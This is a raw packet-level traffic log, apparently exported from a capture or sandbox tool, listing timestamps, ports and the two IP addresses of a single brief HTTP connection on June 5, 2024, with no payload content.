Jun 5, 2024 18:28:36.713001013 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713005066 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713016033 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713023901 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713026047 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713032007 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713042021 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713052988 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713063002 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713074923 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713076115 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713085890 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713098049 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713108063 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713130951 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713134050 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713140965 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713150978 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713155985 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713171005 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713181019 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713191032 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713191986 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713210106 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713243008 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713423967 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713434935 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713445902 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713455915 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713468075 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713478088 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713479996 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713490009 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713499069 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713500977 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713522911 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713588953 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713660002 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713670969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713681936 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713692904 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713705063 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713754892 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713819981 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713835955 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713845968 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713855028 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713865042 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713875055 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713877916 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713893890 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713897943 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713905096 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713911057 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713915110 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713924885 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713936090 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713937044 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713947058 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713957071 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713964939 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713968039 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713978052 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.713979006 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713989973 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.713999987 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714013100 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714020967 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714020967 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714024067 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714035034 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714051008 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714059114 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714061022 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714076996 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714087963 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714097977 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714101076 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714101076 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714107990 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714118958 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714129925 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714140892 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714144945 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714148045 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714155912 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714165926 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714230061 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714236975 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714243889 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714246988 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714256048 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714265108 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714267969 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714277983 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714298010 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714337111 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714349985 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714360952 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714371920 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714382887 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714394093 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714401960 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714404106 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714415073 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714415073 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714426994 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714436054 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714456081 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714479923 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714514971 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714626074 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714636087 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714646101 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714651108 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714657068 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714668036 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714670897 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714680910 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714693069 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714693069 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714714050 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714747906 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714759111 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714770079 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714773893 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714780092 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714792013 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714793921 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714803934 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714814901 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714828968 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714828968 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714911938 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714917898 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714924097 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714934111 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714943886 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714955091 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714962006 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.714965105 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714975119 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.714993000 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715023041 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715029001 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715039968 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715049982 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715060949 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715073109 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715089083 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715100050 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715102911 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715104103 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715104103 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715115070 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715136051 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715163946 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715192080 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715208054 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715219021 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715231895 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715254068 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715270996 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715282917 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715291023 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715291023 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715295076 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715306997 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715312004 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715320110 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715320110 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715338945 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715349913 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715361118 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715456963 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715457916 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715468884 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715478897 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715488911 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715500116 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715511084 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715523005 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715523005 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715526104 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.715548038 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.715593100 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.716590881 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.716609955 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.716620922 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.716650009 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.716660976 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.716671944 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.716679096 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.716685057 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.716705084 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.716761112 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829355001 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829380035 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829390049 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829406977 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829417944 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829447985 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829485893 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829507113 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829514027 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829518080 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829526901 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829539061 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829549074 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829560995 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829560995 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829571009 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829571009 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829581976 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829595089 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829606056 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829699039 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829710960 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829713106 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829727888 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829729080 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829730988 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829741001 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829746962 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829751015 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829757929 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829766989 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829776049 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829781055 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829781055 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829787970 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829804897 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829813004 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829830885 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829835892 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829838037 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829839945 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829843998 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829852104 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.829854012 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829865932 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829876900 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.829915047 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830009937 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830112934 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830172062 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830176115 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830178022 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830269098 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830271006 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830288887 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830301046 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830311060 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830321074 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830321074 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830343962 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830352068 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830374956 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830383062 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830393076 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830425978 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830435991 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830435991 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830462933 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830481052 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830486059 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830492020 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830502033 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830514908 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830519915 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830523968 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830524921 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830529928 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830533981 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830535889 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830542088 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830545902 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830558062 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830629110 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830638885 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830648899 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830661058 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830671072 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830681086 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830691099 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830701113 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830701113 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830786943 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830790997 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830802917 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830812931 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830823898 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830833912 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830836058 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830847025 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830857992 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830868006 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830878973 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830890894 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830890894 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830914974 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830925941 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830940008 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830940008 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830945015 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830955029 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830969095 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830971956 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830974102 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830977917 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830984116 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.830992937 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.830993891 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831001043 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831005096 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831017017 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831067085 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831067085 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831094027 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831110954 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831123114 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831132889 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831144094 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831154108 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831154108 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831161976 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831165075 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831176043 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831187010 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831187963 CEST	49731	80	192.168.2.7	2.56.245.142
Jun 5, 2024 18:28:36.831197023 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831202984 CEST	80	49731	2.56.245.142	192.168.2.7
Jun 5, 2024 18:28:36.831209898 CEST	49731	80	192.168.2.7	2.56.245.142
